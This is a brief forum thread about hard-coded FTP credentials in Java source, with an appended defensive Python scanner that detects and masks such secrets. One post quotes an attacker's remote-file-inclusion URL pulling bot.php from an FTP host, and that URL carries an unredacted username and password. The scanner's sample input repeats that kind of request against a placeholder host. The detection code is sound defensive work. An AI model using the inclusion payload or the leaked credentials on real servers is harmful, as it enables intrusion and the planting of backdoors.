Hard-coded credentials exposed



  • It's so commonplace it's not surprising enough to be a WTF anymore.

    From redacted.com

        public static String STR_FTP_SERVER_ADDRESS = "redacted";
        public static String STR_FTP_USER = "redacted";
        public static String STR_FTP_PASSWORD = "Redacted";


    Yes, they do work. Someone popped an exploit on their FTP server then attempted to trojan my webserver:

        ftp://AlfaRichi:3KpWEwg%@redacted//bot.php


     



  • The scary thing is, he can't even fix it without either deleting the repository or the FTP account...
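
A defender-side check for the two patterns shown in the first post, credential constants hard-coded in Java source and URLs carrying `user:password@`, as an added example that is not part of the original thread. The regexes, function names and sample values are assumptions constructed for illustration.

```python
import re

# Java constant whose name suggests a credential, assigned a string literal.
JAVA_CONST = re.compile(
    r'\bString\s+(?P<name>\w*(?:PASSWORD|PASSWD|PWD|SECRET|TOKEN|USER)\w*)'
    r'\s*=\s*"(?P<value>[^"]+)"',
    re.IGNORECASE,
)
# URL with embedded userinfo: scheme://user:password@host
URL_USERINFO = re.compile(
    r'\b(?P<scheme>[a-z][a-z0-9+.-]*)://(?P<user>[^\s:@/]+):'
    r'(?P<value>[^\s@/]+)@(?P<host>[^\s/:]+)',
    re.IGNORECASE,
)

def mask(secret):
    """Keep findings loggable without repeating the secret itself."""
    return secret[0] + "*" * (len(secret) - 1)

def scan(text):
    """Return (line_no, kind, identifier, masked_value) for each finding."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        for m in JAVA_CONST.finditer(line):
            findings.append((no, "java-constant", m["name"], mask(m["value"])))
        for m in URL_USERINFO.finditer(line):
            ident = f'{m["scheme"]}://{m["user"]}@{m["host"]}'
            findings.append((no, "url-userinfo", ident, mask(m["value"])))
    return findings

# Constructed sample input (not the values from the post): three Java
# constants, one environment lookup that must not be flagged, and one
# web-server log line carrying a credentialed FTP URL.
SAMPLE = '''\
public static String STR_FTP_SERVER_ADDRESS = "ftp.example.test";
public static String STR_FTP_USER = "deploy";
public static String STR_FTP_PASSWORD = "Ex4mple%pw";
String password = System.getenv("FTP_PASSWORD");
GET /index.php?page=ftp://deploy:Ex4mple%pw@ftp.example.test//bot.php
'''

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Run over a full history rather than only the current checkout, a scan like this also surfaces values that were committed earlier and later edited out of the working tree.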

